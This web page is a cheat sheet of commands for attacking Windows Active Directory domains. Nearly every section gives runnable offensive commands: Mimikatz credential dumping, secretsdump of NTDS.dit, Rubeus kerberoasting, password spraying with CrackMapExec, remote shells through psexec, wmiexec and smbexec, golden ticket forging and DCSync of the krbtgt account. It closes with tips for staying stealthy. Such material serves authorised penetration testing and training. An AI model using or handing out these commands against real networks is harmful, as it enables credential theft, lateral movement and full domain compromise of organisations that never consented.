Active Directory Tool Cheat Sheet

Your quick-access toolkit for AD Enumeration, Exploitation, Lateral Movement, and Persistence

  1. Enumeration Tools
  2. Credential Access & Extraction
  3. Privilege Escalation
  4. Lateral Movement
  5. Persistence & Post-Exploitation
  6. BloodHound Query Ideas

Graph-based AD attack path discovery and visualization.

SharpHound.exe -c All

Comprehensive domain enumeration with a nice report format.

.\ADRecon.ps1

PowerShell-based enumeration of users, groups, trusts, ACLs, etc.

Get-DomainUser
Get-DomainGroupMember -Identity "Domain Admins"
Get-NetDomainTrust

LDAP enumeration from Linux systems.

ldapsearch -x -h <DC-IP> -b "DC=domain,DC=local"

Anonymous enumeration of users/groups.

rpcclient -U "" <IP>
enum4linux-ng <IP>

Extract passwords, hashes, tickets, and more from memory.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

Dump passwords from browsers, memory, and apps.

LaZagne.exe all

Dump NTDS.dit remotely or hashes from SAM.

secretsdump.py 'domain/user:password@dc-ip'
Rubeus.exe kerberoast
Rubeus.exe asktgt /user:<username> /rc4:<ntlm>
Rubeus.exe dump

System enumeration focused on privesc and situational awareness.

.\Seatbelt.exe all

Privilege escalation checker for Windows.

Watson.exe

Identify privilege abuse paths like WriteDACL, GenericAll, etc.

SharpHound.exe -c ACL

Swiss Army knife for spraying, enumeration, command execution.

cme smb <IP> -u users.txt -p passwords.txt --shares
cme smb <IP> -u admin -p password --exec-method smbexec -x whoami

Execute commands via WMI remotely.

wmiexec.py domain/user:password@target-ip

Gain SYSTEM shell via SMB.

psexec.py domain/user:password@target-ip

More stealthy alternative to psexec.

smbexec.py domain/user:password@target-ip
Invoke-SMBExec -Target <IP> -Username <user> -Hash <ntlm>

Dump secrets and manipulate AD objects.

Test-PasswordQuality -SamAccountName "Administrator"
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:<hash>
lsadump::dcsync /domain:domain.local /user:krbtgt

Injects a master password into LSASS for any domain account login.

Use Mimikatz or similar post-ex tools. Use with caution.

Suggested queries once BloodHound data is ingested:

  • Shortest paths to Domain Admins
  • Users with Kerberoastable services
  • Computers with unconstrained delegation
  • Accounts with GenericAll or WriteDACL on objects
  • Shadow admin accounts
  • Users with local admin rights across multiple hosts
  • Start light with built-in tools: net user, nltest, nslookup.
  • Use proxychains with CME or BloodHound when pivoting.
  • Prefer runas /netonly or Rubeus for alternate credentials.
  • Keep enumeration and exploitation separate for stealth.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top